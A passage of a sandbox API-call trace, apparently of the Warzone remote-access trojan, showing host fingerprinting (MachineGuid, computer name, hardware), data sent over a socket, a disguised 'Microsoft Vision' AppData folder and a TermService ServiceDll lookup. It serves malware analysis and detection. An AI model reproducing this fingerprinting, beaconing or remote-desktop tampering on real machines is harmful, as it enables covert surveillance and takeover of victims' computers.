[0311.054] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24 [0311.054] lstrcpyW (in: lpString1=0x3770000, lpString2="Intel(R) HD Graphics 630" | out: lpString1="Intel(R) HD Graphics 630") returned="Intel(R) HD Graphics 630" [0311.054] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0311.054] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.054] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0311.054] lstrcpyW (in: lpString1=0x3780000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0311.054] GlobalMemoryStatusEx (in: lpBuffer=0x2c7f440 | out: lpBuffer=0x2c7f440) returned 1 [0311.054] lstrlenW (lpString="") returned 0 [0311.054] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x40b0000 [0311.055] lstrlenW (lpString="") returned 0 [0311.055] lstrcpyW (in: lpString1=0x40b0000, lpString2="" | out: lpString1="") returned="" [0311.055] GetComputerNameW (in: lpBuffer=0x2c7f44c, nSize=0x2c7f46c | out: lpBuffer="XC64ZB", nSize=0x2c7f46c) returned 1 [0311.055] lstrlenW (lpString="XC64ZB") returned 6 [0311.055] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x40c0000 [0311.055] lstrlenW (lpString="XC64ZB") returned 6 [0311.055] lstrcpyW (in: lpString1=0x40c0000, lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0311.055] GetCurrentProcess () returned 0xffffffff [0311.056] GetModuleHandleA (lpModuleName="kernel32") returned 0x74c90000 [0311.056] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0311.056] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2c7f460 | out: Wow64Process=0x2c7f460*=1) returned 1 [0311.056] GetCurrentProcess () returned 0xffffffff [0311.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2c7f468 | out: TokenHandle=0x2c7f468*=0x354) returned 1 [0311.056] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x14, TokenInformation=0x2c7f460, TokenInformationLength=0x4, ReturnLength=0x2c7f464 | out: TokenInformation=0x2c7f460, ReturnLength=0x2c7f464) returned 1 [0311.056] CloseHandle (hObject=0x354) returned 1 [0311.056] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77760000 [0311.056] GetProcAddress (hModule=0x77760000, lpProcName="RtlGetVersion") returned 0x777bdbb0 [0311.056] RtlGetVersion (in: lpVersionInformation=0x2c7f34c | out: lpVersionInformation=0x2c7f34c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0311.056] lstrlenW (lpString="SOFTWARE\\Microsoft\\Cryptography") returned 31 [0311.056] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x40d0000 [0311.057] lstrlenW (lpString="SOFTWARE\\Microsoft\\Cryptography") returned 31 [0311.057] lstrcpyW (in: lpString1=0x40d0000, lpString2="SOFTWARE\\Microsoft\\Cryptography" | out: lpString1="SOFTWARE\\Microsoft\\Cryptography") returned="SOFTWARE\\Microsoft\\Cryptography" [0311.057] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x2c7f454 | out: phkResult=0x2c7f454*=0x354) returned 0x0 [0311.057] VirtualFree (lpAddress=0x40d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.058] lstrlenW (lpString="MachineGuid") returned 11 [0311.058] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x40d0000 [0311.058] lstrlenW (lpString="MachineGuid") returned 11 [0311.058] lstrcpyW (in: lpString1=0x40d0000, lpString2="MachineGuid" | out: lpString1="MachineGuid") returned="MachineGuid" [0311.058] RegQueryValueExW (in: hKey=0x354, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x2c7f420, lpData=0x0, lpcbData=0x2c7f424*=0x0 | out: lpType=0x2c7f420*=0x1, lpData=0x0, lpcbData=0x2c7f424*=0x4a) returned 0x0 [0311.058] GetProcessHeap () returned 0x650000 [0311.058] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4a) returned 0x681798 [0311.058] RegQueryValueExW (in: hKey=0x354, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x2c7f420, lpData=0x681798, lpcbData=0x2c7f424*=0x4a | out: lpType=0x2c7f420*=0x1, lpData="03845cb8-7441-4a2f-8c0f-c90408af5778", lpcbData=0x2c7f424*=0x4a) returned 0x0 [0311.058] GetProcessHeap () returned 0x650000 [0311.058] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a) returned 0x6815e0 [0311.058] GetProcessHeap () returned 0x650000 [0311.059] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681798 | out: hHeap=0x650000) returned 1 [0311.059] VirtualFree (lpAddress=0x40d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.059] RegCloseKey (hKey=0x354) returned 0x0 [0311.060] GetProcessHeap () returned 0x650000 [0311.060] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x14) returned 0x680128 [0311.060] GetProcessHeap () returned 0x650000 [0311.060] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x14) returned 0x67fec8 [0311.060] GetProcessHeap () returned 0x650000 [0311.060] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x680128 | out: hHeap=0x650000) returned 1 [0311.060] GetProcessHeap () returned 0x650000 [0311.060] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x14) returned 0x67fe68 [0311.060] GetProcessHeap () returned 0x650000 [0311.060] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6815e0 | out: hHeap=0x650000) returned 1 [0311.060] GetProcessHeap () returned 0x650000 [0311.060] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x14) returned 0x67fe48 [0311.060] lstrlenW (lpString="XC64ZB") returned 6 [0311.060] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x40d0000 [0311.061] lstrcpyW (in: lpString1=0x40d0000, lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0311.061] lstrlenW (lpString="") returned 0 [0311.061] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0311.061] lstrcpyW (in: lpString1=0x40e0000, lpString2="" | out: lpString1="") returned="" [0311.061] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0311.061] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0311.061] lstrcpyW (in: lpString1=0x40f0000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0311.062] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24 [0311.062] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x4100000 [0311.062] lstrcpyW (in: lpString1=0x4100000, lpString2="Intel(R) HD Graphics 630" | out: lpString1="Intel(R) HD Graphics 630") returned="Intel(R) HD Graphics 630" [0311.062] GetProcessHeap () returned 0x650000 [0311.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67fec8 | out: hHeap=0x650000) returned 1 [0311.062] VirtualFree (lpAddress=0x40c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.063] VirtualFree (lpAddress=0x40b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.064] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.065] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.065] GetProcessHeap () returned 0x650000 [0311.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x14) returned 0x67ff48 [0311.065] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x67ff48, Size=0x18) returned 0x67ff88 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x67ff88, Size=0x1c) returned 0x6ad170 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6ad170, Size=0x20) returned 0x6ad238 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6ad238, Size=0x24) returned 0x682820 [0311.066] lstrlenW (lpString="XC64ZB") returned 6 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x682820, Size=0x28) returned 0x6825b0 [0311.066] lstrlenW (lpString="XC64ZB") returned 6 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6825b0, Size=0x36) returned 0x6acb20 [0311.066] lstrlenW (lpString="") returned 0 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6acb20, Size=0x3a) returned 0x6a9f08 [0311.066] lstrlenW (lpString="") returned 0 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6a9f08, Size=0x3c) returned 0x6aa028 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6aa028, Size=0x40) returned 0x6a9f08 [0311.066] GetProcessHeap () returned 0x650000 [0311.066] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6a9f08, Size=0x44) returned 0x67c320 [0311.067] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x67c320, Size=0x48) returned 0x67c640 [0311.067] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x67c640, Size=0x98) returned 0x681fc8 [0311.067] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x681fc8, Size=0x9c) returned 0x681fc8 [0311.067] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x681fc8, Size=0xce) returned 0x681fc8 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x6725e0 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6725e0, Size=0x8) returned 0x6726b0 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6726b0, Size=0xc) returned 0x678dd8 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x678dd8, Size=0xda) returned 0x681cd8 [0311.067] GetProcessHeap () returned 0x650000 [0311.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xda) returned 0x682b78 [0311.067] GetProcessHeap () returned 0x650000 [0311.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681fc8 | out: hHeap=0x650000) returned 1 [0311.068] GetProcessHeap () returned 0x650000 [0311.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681cd8 | out: hHeap=0x650000) returned 1 [0311.068] lstrlenA (lpString="warzone160") returned 10 [0311.068] lstrlenA (lpString="warzone160") returned 10 [0311.068] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0311.077] lstrcpyA (in: lpString1=0x3770000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0311.077] lstrlenA (lpString="warzone160") returned 10 [0311.077] GetProcessHeap () returned 0x650000 [0311.077] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678dd8 [0311.077] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.078] GetProcessHeap () returned 0x650000 [0311.078] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xda) returned 0x681fc8 [0311.079] GetProcessHeap () returned 0x650000 [0311.079] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678e20 [0311.079] GetProcessHeap () returned 0x650000 [0311.079] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xda) returned 0x681cd8 [0311.079] GetProcessHeap () returned 0x650000 [0311.079] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xda) returned 0x682c60 [0311.079] GetProcessHeap () returned 0x650000 [0311.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681cd8 | out: hHeap=0x650000) returned 1 [0311.079] GetProcessHeap () returned 0x650000 [0311.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678e20 | out: hHeap=0x650000) returned 1 [0311.079] GetProcessHeap () returned 0x650000 [0311.079] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681fc8 | out: hHeap=0x650000) returned 1 [0311.080] send (s=0x2c0, buf=0x682c60*, len=218, flags=0) returned 218 [0311.128] GetProcessHeap () returned 0x650000 [0311.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x682c60 | out: hHeap=0x650000) returned 1 [0311.129] GetProcessHeap () returned 0x650000 [0311.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678dd8 | out: hHeap=0x650000) returned 1 [0311.129] GetProcessHeap () returned 0x650000 [0311.129] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x682b78 | out: hHeap=0x650000) returned 1 [0311.129] VirtualFree (lpAddress=0x4100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.130] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.130] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.131] VirtualFree (lpAddress=0x40d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.132] GetProcessHeap () returned 0x650000 [0311.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67fe48 | out: hHeap=0x650000) returned 1 [0311.132] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2c7f4a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0311.132] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0311.132] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 0 [0311.132] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0311.132] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x29f882f, lpParameter=0x2b3d0e8, dwCreationFlags=0x0, lpThreadId=0x2b3db60 | out: lpThreadId=0x2b3db60*=0xdc8) returned 0x354 [0311.133] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2c7f240 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0311.133] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0311.133] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned 53 [0311.133] VirtualAlloc (lpAddress=0x0, dwSize=0x6c, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0311.134] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned 53 [0311.134] lstrcpyW (in: lpString1=0x3770000, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0311.134] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned 53 [0311.134] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0311.134] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.135] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned 53 [0311.135] GetProcessHeap () returned 0x650000 [0311.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x672650 [0311.135] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned 53 [0311.135] GetProcessHeap () returned 0x650000 [0311.135] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x672650, Size=0x70) returned 0x681fc8 [0311.135] GetProcessHeap () returned 0x650000 [0311.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x6725b0 [0311.135] GetProcessHeap () returned 0x650000 [0311.135] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6725b0, Size=0x8) returned 0x6726b0 [0311.135] GetProcessHeap () returned 0x650000 [0311.135] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6726b0, Size=0xc) returned 0x678e20 [0311.135] GetProcessHeap () returned 0x650000 [0311.135] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x678e20, Size=0x7c) returned 0x682040 [0311.135] GetProcessHeap () returned 0x650000 [0311.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x681cd8 [0311.135] GetProcessHeap () returned 0x650000 [0311.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681fc8 | out: hHeap=0x650000) returned 1 [0311.136] GetProcessHeap () returned 0x650000 [0311.136] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x682040 | out: hHeap=0x650000) returned 1 [0311.136] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.137] lstrlenA (lpString="warzone160") returned 10 [0311.137] lstrlenA (lpString="warzone160") returned 10 [0311.137] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0311.138] lstrcpyA (in: lpString1=0x3770000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0311.138] lstrlenA (lpString="warzone160") returned 10 [0311.138] GetProcessHeap () returned 0x650000 [0311.138] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678e20 [0311.138] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.139] GetProcessHeap () returned 0x650000 [0311.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x681d60 [0311.139] GetProcessHeap () returned 0x650000 [0311.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ce8 [0311.139] GetProcessHeap () returned 0x650000 [0311.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x681fc8 [0311.139] GetProcessHeap () returned 0x650000 [0311.139] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x6825b8 [0311.139] GetProcessHeap () returned 0x650000 [0311.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681fc8 | out: hHeap=0x650000) returned 1 [0311.139] GetProcessHeap () returned 0x650000 [0311.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0311.139] GetProcessHeap () returned 0x650000 [0311.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681d60 | out: hHeap=0x650000) returned 1 [0311.140] send (s=0x2c0, buf=0x6825b8*, len=124, flags=0) returned 124 [0311.140] GetProcessHeap () returned 0x650000 [0311.141] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6825b8 | out: hHeap=0x650000) returned 1 [0311.141] GetProcessHeap () returned 0x650000 [0311.141] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678e20 | out: hHeap=0x650000) returned 1 [0311.141] GetProcessHeap () returned 0x650000 [0311.141] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681cd8 | out: hHeap=0x650000) returned 1 [0311.141] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.142] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.142] GetProcessHeap () returned 0x650000 [0311.142] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x66ff18 | out: hHeap=0x650000) returned 1 [0311.142] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0311.772] GetProcessHeap () returned 0x650000 [0311.773] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678bb0 [0311.775] GetProcessHeap () returned 0x650000 [0311.776] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678c40 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678bc8 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678c58 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678be0 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678c58 | out: hHeap=0x650000) returned 1 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678bc8 | out: hHeap=0x650000) returned 1 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678c40 | out: hHeap=0x650000) returned 1 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678be0 | out: hHeap=0x650000) returned 1 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678bb0 | out: hHeap=0x650000) returned 1 [0311.777] GetProcessHeap () returned 0x650000 [0311.777] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678bb0 [0311.777] GetProcessHeap () returned 0x650000 [0311.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678bc8 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678c40 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cb8 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678be0 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678c40 | out: hHeap=0x650000) returned 1 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678bc8 | out: hHeap=0x650000) returned 1 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678bc8 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678bb0 | out: hHeap=0x650000) returned 1 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678be0 | out: hHeap=0x650000) returned 1 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x669330 | out: hHeap=0x650000) returned 1 [0311.778] GetProcessHeap () returned 0x650000 [0311.778] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6725e0 [0311.778] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters") returned 56 [0311.778] VirtualAlloc (lpAddress=0x0, dwSize=0x72, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0311.779] lstrlenW (lpString="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters") returned 56 [0311.779] lstrcpyW (in: lpString1=0x3760000, lpString2="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters" | out: lpString1="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters") returned="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters" [0311.779] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters", ulOptions=0x0, samDesired=0x20119, phkResult=0x2c7f7b4 | out: phkResult=0x2c7f7b4*=0x358) returned 0x0 [0311.779] lstrlenW (lpString="ServiceDll") returned 10 [0311.779] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.780] lstrlenW (lpString="ServiceDll") returned 10 [0311.780] lstrcpyW (in: lpString1=0x3780000, lpString2="ServiceDll" | out: lpString1="ServiceDll") returned="ServiceDll" [0311.780] RegQueryValueExW (in: hKey=0x358, lpValueName="ServiceDll", lpReserved=0x0, lpType=0x2c7f780, lpData=0x0, lpcbData=0x2c7f784*=0x0 | out: lpType=0x2c7f780*=0x2, lpData=0x0, lpcbData=0x2c7f784*=0x44) returned 0x0 [0311.780] GetProcessHeap () returned 0x650000 [0311.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x67c320 [0311.780] RegQueryValueExW (in: hKey=0x358, lpValueName="ServiceDll", lpReserved=0x0, lpType=0x2c7f780, lpData=0x67c320, lpcbData=0x2c7f784*=0x44 | out: lpType=0x2c7f780*=0x2, lpData="%SystemRoot%\\System32\\termsrv.dll", lpcbData=0x2c7f784*=0x44) returned 0x0 [0311.780] GetProcessHeap () returned 0x650000 [0311.780] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x44) returned 0x67c640 [0311.780] GetProcessHeap () returned 0x650000 [0311.780] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67c320 | out: hHeap=0x650000) returned 1 [0311.780] VirtualFree (lpAddress=0x3780000, 